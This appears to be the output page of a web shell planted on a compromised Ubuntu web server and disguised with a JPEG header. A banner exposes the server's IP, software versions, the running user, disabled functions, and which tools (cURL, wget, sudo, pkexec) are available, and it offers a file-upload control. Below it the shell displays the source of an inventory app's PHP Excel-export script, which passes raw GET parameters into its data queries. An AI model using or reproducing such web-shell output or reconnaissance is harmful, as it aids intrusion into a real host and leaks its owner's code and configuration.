����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 3.144.88.107 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/app6/report/ |
Upload File : |
<?php /** Error reporting */ error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE); include "../core/autoload.php"; include "../core/app/model/SellData.php"; include "../core/app/model/ProductData.php"; include "../core/app/model/OperationData.php"; include "../core/app/model/DData.php"; include "../core/app/model/PData.php"; /** Include PHPExcel */ //require_once dirname(__FILE__) . '/../Classes/PHPExcel.php'; require_once '../core/controller/PHPExcel/Classes/PHPExcel.php'; // Create new PHPExcel object $objPHPExcel = new PHPExcel(); $products = array(); if($_GET["client_id"]==""){ $products = SellData::getAllByDateOp($_GET["sd"],$_GET["ed"],1); } else{ $products = SellData::getAllByDateBCOp($_GET["client_id"],$_GET["sd"],$_GET["ed"],1); } // Set document properties $objPHPExcel->getProperties()->setCreator("Inventio Max v3.1") ->setLastModifiedBy("Inventio Max v3.1") ->setTitle("Inventio Max v3.1") ->setSubject("Inventio Max v3.1") ->setDescription("") ->setKeywords("") ->setCategory(""); // Add some data $sheet = $objPHPExcel->setActiveSheetIndex(0); $sheet->setCellValue('A1', 'Reporte de Compras - Inventio Max') ->setCellValue('A2', 'Id') ->setCellValue('B2', 'Pago') ->setCellValue('C2', 'Entrega') ->setCellValue('D2', 'Total') ->setCellValue('E2', 'Fecha'); $start = 3; foreach($products as $product){ $total=0; $ops = OperationData::getAllProductsBySellId($product->id); foreach($ops as $op){ //$product = $op->getProduct(); $total += $op->q*$op->price_in; } $sheet->setCellValue('A'.$start, $product->id) ->setCellValue('B'.$start, $product->getP()->name) ->setCellValue('C'.$start, $product->getD()->name) ->setCellValue('D'.$start, $total) ->setCellValue('E'.$start, $product->created_at); $start++; } // Set active sheet index to the first sheet, so Excel opens this as the first sheet $objPHPExcel->setActiveSheetIndex(0); // Redirect output to a client’s web browser (Excel2007) header('Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'); header('Content-Disposition: attachment;filename="resreport-'.time().'.xlsx"'); header('Cache-Control: max-age=0'); // If you're serving to IE 9, then the following may be needed header('Cache-Control: max-age=1'); // If you're serving to IE over SSL, then the following may be needed header ('Expires: Mon, 26 Jul 1997 05:00:00 GMT'); // Date in the past header ('Last-Modified: '.gmdate('D, d M Y H:i:s').' GMT'); // always modified header ('Cache-Control: cache, must-revalidate'); // HTTP/1.1 header ('Pragma: public'); // HTTP/1.0 $objWriter = PHPExcel_IOFactory::createWriter($objPHPExcel, 'Excel2007'); $objWriter->save('php://output'); exit;